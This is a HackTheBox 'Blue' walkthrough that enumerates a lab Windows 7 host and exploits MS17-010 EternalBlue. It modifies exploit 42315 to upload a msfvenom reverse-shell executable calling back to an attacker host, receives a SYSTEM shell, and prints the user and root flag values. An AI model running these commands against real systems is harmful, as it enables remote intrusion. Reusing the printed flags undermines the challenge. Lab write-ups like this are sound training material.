HackTheBox Blue

Machine Synopsis

Blue, while possibly the most simple machine on Hack The Box, demonstrates the severity of the EternalBlue exploit, which has been used in multiple large-scale ransomware and crypto-mining attacks since it was leaked publicly. (Source)

Enumeration

$ nmap -sC -sV -A 10.10.10.40

PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC

Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2022-02-09T04:45:21
|_  start_date: 2022-02-09T04:43:42
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-02-09T04:45:22+00:00
|_clock-skew: mean: 3s, deviation: 2s, median: 2s

It seems like there is no website for this challenge. Let’s run nmap with --scripts=vuln to check for any low hanging fruits.

$ nmap --script=vuln 10.10.10.40

PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

This machine is vulnerable to the infamous MS17-010 EternalBlue.

Exploitation

$ searchsploit --id ms17-010
...
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)    | 42031
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Exe | 42315
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS | 42030
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution  | 41987
...

$ searchsploit -m 42315

Reading the source code shows that we need to download mysmb.py from this link.

$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py
                                                           
$ mv 42315.py mysmb.py     

Looking further through the source code, it shows that we need a username and password. We can use enum4linux to try and enumerate some information from the Windows machine.

$ enum4linux -a 10.10.10.40

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.40
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

... [Other information that is not needed]

guest account is enabled. We can add the guest account to the exploit code.

USERNAME = 'guest'
PASSWORD = ''

Now, we need to create a reverse shell payload using msfvenom.

$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=1234 -f exe > exploit.exe

Adjust the following part of the exploit code of 42315.py.

def smb_pwn(conn, arch):
	smbConn = conn.get_smbconnection()

	print('creating file c:\\exploit.exe on the target')
	tid2 = smbConn.connectTree('C$')
	fid2 = smbConn.createFile(tid2, '/exploit.exe')
	smbConn.closeFile(tid2, fid2)
	smbConn.disconnectTree(tid2)

	# Send reverse shell payload
	smb_send_file(smbConn, '/home/shiro/HackTheBox/Blue/exploit.exe', 'C', '/exploit.exe')
	# Execute the reverse shell payload
	service_exec(conn, r'cmd /c c:\exploit.exe')
	# Note: there are many methods to get shell over SMB admin session
	# a simple method to get shell (but easily to be detected by AV) is
	# executing binary generated by "msfvenom -f exe-service ..."

Execute the exploit and get the reverse shell!

$ python 42315.py 10.10.10.40                                                       
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: samr
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
...
Opening SVCManager on 10.10.10.40.....
Creating service cFsa.....
Starting service cFsa.....
The NETBIOS connection with the remote host timed out.
Removing service cFsa.....
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
Done

$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.40] 49161
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Users>cd "C:\Users\haris\Desktop"
C:\Users\haris\Desktop>type user.txt
4c546aea7dbee75cbd71de245c8deea9

C:\Users\haris\Desktop>cd "C:\Users\Administrator\Desktop"
C:\Users\Administrator\Desktop>type root.txt
ff548eb71e920ff6c08843ce9df4e717